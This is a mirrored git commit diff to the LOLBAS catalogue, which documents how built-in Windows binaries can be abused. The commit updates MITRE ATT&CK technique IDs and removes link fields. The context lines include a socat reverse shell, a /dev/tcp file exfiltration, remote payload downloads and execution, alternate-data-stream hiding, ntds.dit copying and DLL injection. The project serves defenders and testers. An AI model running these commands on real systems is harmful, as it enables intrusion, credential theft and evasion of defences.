mirror of
				https://github.com/LOLBAS-Project/LOLBAS
				synced 2025-10-25 14:55:19 +02:00 
			
		
		
		
	MITRE ATT&CK realignment sprint
This commit is contained in:
		| @@ -5,12 +5,11 @@ Author: 'Wade Hickey' | ||||
| Created: '2020-12-02' | ||||
| Commands: | ||||
|   - Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw | ||||
|     Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>  | ||||
|     Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY> | ||||
|     Usecase: Download file from Internet | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe | ||||
|   | ||||
| @@ -1,6 +1,6 @@ | ||||
| --- | ||||
| Name: Aspnet_Compiler.exe | ||||
| Description: ASP.NET Compilation Tool  | ||||
| Description: ASP.NET Compilation Tool | ||||
| Author: Jimmy (@bohops) | ||||
| Created: 2021-09-26 | ||||
| Commands: | ||||
| @@ -10,14 +10,13 @@ Commands: | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1218/ | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | ||||
|   - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe | ||||
| Code_Sample:  | ||||
| Code_Sample: | ||||
|   - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder | ||||
| Detection:  | ||||
| Detection: | ||||
|   - IOC: Sysmon Event ID 1 - Process Creation | ||||
| Resources: | ||||
|   - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ | ||||
| @@ -25,4 +24,4 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: cpl | ||||
|     Handle: '@cpl3h' | ||||
| --- | ||||
| --- | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: Local Admin | ||||
|     MitreID: T1053 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1053 | ||||
|     OperatingSystem: Windows 7 or older | ||||
| Full_Path: | ||||
|   - Path: C:\WINDOWS\System32\At.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\Atbroker.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 10 | ||||
|   - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane" | ||||
|     Description: Executes a reverseshell | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 10 | ||||
|   - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24' | ||||
|     Description: Exfiltrate data | ||||
| @@ -26,7 +24,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 10 | ||||
|   - Command: bash.exe -c calc.exe | ||||
|     Description: Executes calc.exe from bash.exe | ||||
| @@ -34,7 +31,6 @@ Commands: | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\bash.exe | ||||
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     Usecase: Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique. | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1 | ||||
|     Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset | ||||
|     Description: Command for copying cmd.exe to another folder | ||||
| @@ -26,7 +24,6 @@ Commands: | ||||
|     Category: Copy | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset | ||||
|     Description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. | ||||
| @@ -34,7 +31,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\bitsadmin.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1218/ | ||||
|     OperatingSystem: Windows Server 2022 | ||||
|   - Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1 | ||||
|     Description: Downloads text formatted files | ||||
| @@ -18,14 +17,13 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1105/ | ||||
|     OperatingSystem: Windows Server 2022   | ||||
|     OperatingSystem: Windows Server 2022 | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\certoc.exe | ||||
|   - Path: c:\windows\syswow64\certoc.exe | ||||
| Code_Sample:  | ||||
| Code_Sample: | ||||
|   - Code: | ||||
| Detection:  | ||||
| Detection: | ||||
|   - IOC: Process creation with given parameter | ||||
|   - IOC: Unsigned DLL load via certoc.exe | ||||
|   - IOC: Network connection via certoc.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal | ||||
|     Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Upload | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\certreq.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe | ||||
|     Description: Download and save 7zip to disk in the current folder. | ||||
| @@ -18,15 +17,13 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | ||||
|     Description: Download and save a PS1 file to an Alternate Data Stream (ADS). | ||||
|     Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: certutil -encode inputFileName encodedOutputFileName | ||||
|     Description: Command to encode a file using Base64 | ||||
| @@ -34,7 +31,6 @@ Commands: | ||||
|     Category: Encode | ||||
|     Privileges: User | ||||
|     MitreID: T1027 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1027 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: certutil -decode encodedInputFileName decodedOutputFileName | ||||
|     Description: Command to decode a Base64 encoded file. | ||||
| @@ -42,7 +38,6 @@ Commands: | ||||
|     Category: Decode | ||||
|     Privileges: User | ||||
|     MitreID: T1140 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1140 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: certutil --decodehex encoded_hexadecimal_InputFileName | ||||
|     Description: Command to decode a hexadecimal-encoded file decodedOutputFileName | ||||
| @@ -50,7 +45,6 @@ Commands: | ||||
|     Category: Decode | ||||
|     Privileges: User | ||||
|     MitreID: T1140 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1140 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\certutil.exe | ||||
|   | ||||
| @@ -9,16 +9,14 @@ Commands: | ||||
|     Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1170 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1170 | ||||
|     MitreID: T1059.003 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: cmd.exe - < fakefile.doc:payload.bat | ||||
|     Description: Execute payload.bat stored in an Alternate Data Stream (ADS). | ||||
|     Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1170 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1170 | ||||
|     MitreID: T1059.003 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\cmd.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Credentials | ||||
|     Privileges: User | ||||
|     MitreID: T1078 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1078 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\cmdkey.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1105/ | ||||
|     OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\cmdl32.exe | ||||
|   | ||||
| @@ -9,16 +9,14 @@ Commands: | ||||
|     Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet. | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1191 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1191 | ||||
|     MitreID: T1218.003 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf | ||||
|     Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. | ||||
|     Usecase: Execute code hidden within an inf file. Execute code directly from Internet. | ||||
|     Category: AwL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1191 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1191 | ||||
|     MitreID: T1218.003 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\cmstp.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Upload | ||||
|     Privileges: User | ||||
|     MitreID: T1567 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1567/ | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe | ||||
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1196 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1196 | ||||
|     MitreID: T1218.002 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\control.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Compile | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: csc -target:library File.cs | ||||
|     Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to a dll file. | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Compile | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe | ||||
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\cscript.exe | ||||
|   | ||||
| @@ -10,13 +10,12 @@ Commands: | ||||
|     Category: Upload | ||||
|     Privileges: User | ||||
|     MitreID: T1567 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1567/ | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe | ||||
| Code_Sample:  | ||||
| Code_Sample: | ||||
|   - Code: https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6 | ||||
| Detection:  | ||||
| Detection: | ||||
|   - IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory. | ||||
|   - IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS. | ||||
|   - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil. | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1105/ | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\desktopimgdownldr.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: AWL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe | ||||
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     Usecase: Hide data compressed into an Alternate Data Stream. | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1. | ||||
|   - Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab | ||||
|     Description: Download and compress a remote file and store it in a cab file on local machine. | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019 | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\diantz.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Dump | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows server | ||||
|   - Command: diskshadow> exec calc.exe | ||||
|     Description: Execute commands using diskshadow.exe to spawn child process | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1003 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1003 | ||||
|     OperatingSystem: Windows server | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\diskshadow.exe | ||||
|   | ||||
| @@ -10,12 +10,11 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1546.015 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1546/015/ | ||||
|     OperatingSystem: Windows 10 (and likely previous versions) | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\dllhost.exe | ||||
|   - Path: C:\Windows\SysWOW64\dllhost.exe | ||||
| Code_Sample:  | ||||
| Code_Sample: | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: | ||||
|   | ||||
| @@ -6,11 +6,10 @@ Created: 2018-05-25 | ||||
| Commands: | ||||
|   - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll | ||||
|     Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details. | ||||
|     Usecase: Remotly inject dll to dns server | ||||
|     Usecase: Remotely inject dll to dns server | ||||
|     Category: Execute | ||||
|     Privileges: DNS admin | ||||
|     MitreID: T1035 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1035 | ||||
|     MitreID: T1543.003 | ||||
|     OperatingSystem: Windows server | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\Dnscmd.exe | ||||
|   | ||||
| @@ -10,39 +10,34 @@ Commands: | ||||
|     Category: Copy | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o | ||||
|     Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file. | ||||
|     Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o | ||||
|     Description: Copies the source Alternate Data Stream (ADS) to the destination EXE. | ||||
|     Usecase: Extract hidden file within alternate data streams | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o | ||||
|     Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file. | ||||
|     Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o | ||||
|     Description: Copies the source EXE to the destination EXE file | ||||
|     Usecase: Use to copy files from one unc path to another | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit | ||||
|     Description: Copies a (locked) file using Volume Shadow Copy | ||||
| @@ -50,7 +45,6 @@ Commands: | ||||
|     Category: Copy | ||||
|     Privileges: Admin | ||||
|     MitreID: T1003 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1003/ | ||||
|     OperatingSystem: Windows 10, Windows 2016 Server, Windows 2019 Server | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\esentutl.exe | ||||
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. | ||||
|     Category: UAC bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1088 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1088 | ||||
|     MitreID: T1548.002 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\eventvwr.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: expand c:\ADS\file1.bat c:\ADS\file2.bat | ||||
|     Description: Copies source file to destination. | ||||
| @@ -18,15 +17,13 @@ Commands: | ||||
|     Category: Copy | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat | ||||
|     Description: Copies source file to destination Alternate Data Stream (ADS) | ||||
|     Usecase: Copies files from A to B | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\Expand.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: explorer.exe C:\Windows\System32\notepad.exe | ||||
|     Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 10 (Tested) | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\explorer.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Program Files\Internet Explorer\Extexport.exe | ||||
|   | ||||
| @@ -9,16 +9,14 @@ Commands: | ||||
|     Usecase: Extract data from cab file and hide it in an alternate data stream. | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe | ||||
|     Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file. | ||||
|     Usecase: Extract data from cab file and hide it in an alternate data stream. | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt | ||||
|     Description: Copy the source file to the destination file and overwrite it. | ||||
| @@ -26,7 +24,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe | ||||
|     Description: Command for copying calc.exe to another folder | ||||
| @@ -34,7 +31,6 @@ Commands: | ||||
|     Category: Copy | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\extrac32.exe | ||||
|   | ||||
| @@ -9,24 +9,21 @@ Commands: | ||||
|     Usecase: Add a file to an alternate data stream to hide from defensive counter measures | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
